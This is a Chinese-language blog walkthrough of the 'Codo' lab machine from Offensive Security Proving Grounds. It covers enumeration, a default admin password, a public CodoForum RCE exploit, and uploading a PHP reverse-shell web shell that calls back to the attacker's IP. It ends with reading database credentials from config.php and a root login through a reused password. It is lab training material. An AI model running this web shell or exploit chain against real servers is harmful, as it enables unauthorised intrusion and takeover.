Codo

0588

简介

point 10

Warm up

Difficulty Easy

rated by community Easy

 

Part 2 of Mid Year CTF machines

 

实验环境

攻击者 Kali 192.168.45.200

受害者 IP 192.168.200.23   Linux

 

1. 信息收集

收集受害者服务详情

nmap -sV -A 192.168.200.23

2024-03-09_15-03

 

FUZZ测试

export URL="http://192.168.200.23/FUZZ" 

#模糊测试目录 排除404网页
wfuzz -c -z file,/usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt --hc 404 "$URL"

#模糊测试文件 排除404网页
wfuzz -c -z file,/usr/share/seclists/Discovery/Web-Content/raft-large-files.txt --hc 404 "$URL"

2024-03-09_16-48

有一个admin比较可疑

 

nikto扫描

nikto -host=http://192.168.200.23

没有收获

 

2. 漏洞发现和利用

2024-03-09_16-51

在文章中说 我们用户名是admin

上面我们找到了登录页面 http://192.168.200.23/admin

Burp抓包 爆破密码

结果密码是admin

 

观察上图画圈位置有CMS可能能用的上

Codoforum

 

searchsploit Codoforum

CodoForum v5.1 – Remote Code Execution (RCE) | php/webapps/50978.py

可能这个能用

2024-03-09_16-53

用法在这

尝试使用

python3 50978.py -t http://192.168.200.23 -u admin -p admin -i 192.168.45.200 -n 1234

2024-03-09_16-56

发现没法直接进去 但是告诉我们一个手动传木马的方法

 

ok 我们进入后台

2024-03-09_16-57

按照上面的方法 Global Settings 

2024-03-09_16-58

这里我把上传的文件限制中多加了一个php 那么我们就可以传输php木马了

再往下

2024-03-09_16-59

根据上面的提示 我们要在上面那个框中传入php木马

写一条木马

vim reverse_tcp.php
<?php echo system("bash -c 'bash -i >& /dev/tcp/192.168.45.200/3333 0>&1'");?>

Kali监听

nc -lvnp 3333

 

点击save

输入以下URL

http://192.168.200.23/sites/default/assets/img/attachments/reverse_tcp.php

就能连接上shell了

 

3. 后渗透阶段

先建立交互式和稳定shell

 

然后查看网络信息

netstat -antlp

发现没有

用ss代替

ss -tunlp

2024-03-09_17-04

发现有监听在本地的mysql服务

 

我首先想到到网站目录中看看有没有config.php之类的文件

经过查找 果然有/var/www/html/sites/default/config.php

查看发现有一组用户名和密码

2024-03-09_17-06

codo FatPanda123

 

我们使用这一组密码尝试登录mysql

可以登录

找到user

2024-03-09_17-07

好像没什么用

 

到家目录看看

www-data@codo:/var/www/html/sites/default$ cd /home
www-data@codo:/home$ ls -l
total 4
drwxr-xr-x 3 offsec offsec 4096 Jun  9  2023 offsec
www-data@codo:/home$ cd offsec/
www-data@codo:/home/offsec$ ls -l
total 0

发现一个用户offsec 貌似他的目录是空的

 

查看内核和版本详情

www-data@codo:/home/offsec$ uname -a
Linux codo 5.4.0-150-generic #167-Ubuntu SMP Mon May 15 17:35:05 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux
www-data@codo:/home/offsec$ cat /etc/*-release
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=20.04
DISTRIB_CODENAME=focal
DISTRIB_DESCRIPTION="Ubuntu 20.04.6 LTS"
NAME="Ubuntu"
VERSION="20.04.6 LTS (Focal Fossa)"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 20.04.6 LTS"
VERSION_ID="20.04"
HOME_URL="https://www.ubuntu.com/"
SUPPORT_URL="https://help.ubuntu.com/"
BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/"
PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy"
VERSION_CODENAME=focal
UBUNTU_CODENAME=focal

好像挺高的 估计没办法内核提权了

 

最后经过尝试

root的密码竟然和数据库密码是一样的 直接可以登录root

FatPanda123

 

我们直接到/root里面找flag就好了

2024-03-09_17-10

实验结束

 

 

© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
Offensive Security PG Practise
喜欢就支持一下吧
点赞8 分享
zhyann的头像-白鸢的笔记钻石会员
Active Directory Introduction and Enumeration 2-白鸢的笔记
Active Directory Introduction and Enumeration 2
Active Directory Introduction and Enumeration 2
1年前 182
winPEAS使用 利用有缺陷的注册表权限提权-白鸢的笔记
winPEAS使用 利用有缺陷的注册表权限提权
winPEAS使用 利用有缺陷的注册表权限提权
1年前 150
使用自动化脚本实现Linux信息收集工作-白鸢的笔记
使用自动化脚本实现Linux信息收集工作
使用自动化脚本实现Linux信息收集工作
2年前 138
NTLM认证-白鸢的笔记
NTLM认证
NTLM认证
11个月前 133
Exghost ftp爆破 curl上传-白鸢的笔记
Exghost ftp爆破 curl上传
Exghost ftp爆破 curl上传
11个月前 123
判断语句的嵌套-白鸢的笔记
判断语句的嵌套
判断语句的嵌套
2年前 118
相关推荐
Exghost ftp爆破 curl上传-白鸢的笔记
Exghost ftp爆破 curl上传
Exghost ftp爆破 curl上传
11个月前 123
Exfiltrated-白鸢的笔记
Exfiltrated
Exfiltrated
1年前 92
Flimsy-白鸢的笔记
Flimsy
Flimsy
1年前 91
LaVita-白鸢的笔记
LaVita
LaVita
1年前 85
Jacko-白鸢的笔记
Jacko
Jacko
1年前 83
DepthB2R SSH远程代码执行-白鸢的笔记
DepthB2R SSH远程代码执行
DepthB2R SSH远程代码执行
1年前 76
评论 抢沙发
头像
欢迎您留下宝贵的见解!
提交
头像

昵称

取消
昵称

请填写用户信息:

  • 昵称(必填)
  • 邮箱(必填)
表情
[aoman][baiyan][bishi][bizui][cahan][ciya][dabing][daku][deyi][doge][fadai][fanu][fendou][ganga][guzhang][haixiu][hanxiao][zuohengheng][zhuakuang][zhouma][zhemo][zhayanjian][zaijian][yun][youhengheng][yiwen][yinxian][xu][xieyanxiao][xiaoku][xiaojiujie][xia][wunai][wozuimei][weixiao][weiqu][tuosai][tu][touxiao][tiaopi][shui][se][saorao][qiudale][se][qinqin][qiaoda][piezui][penxue][nanguo][liulei][liuhan][lenghan][leiben][kun][kuaikule][ku][koubi][kelian][keai][jingya][jingxi][jingkong][jie][huaixiao][haqian][aini][OK][qiang][quantou][shengli][woshou][gouyin][baoquan][aixin][bangbangtang][xiaoyanger][xigua][hexie][pijiu][lanqiu][juhua][hecai][haobang][caidao][baojin][chi][dan][kulou][shuai][shouqiang][yangtuo][youling]
代码

请输入代码:

确认
图片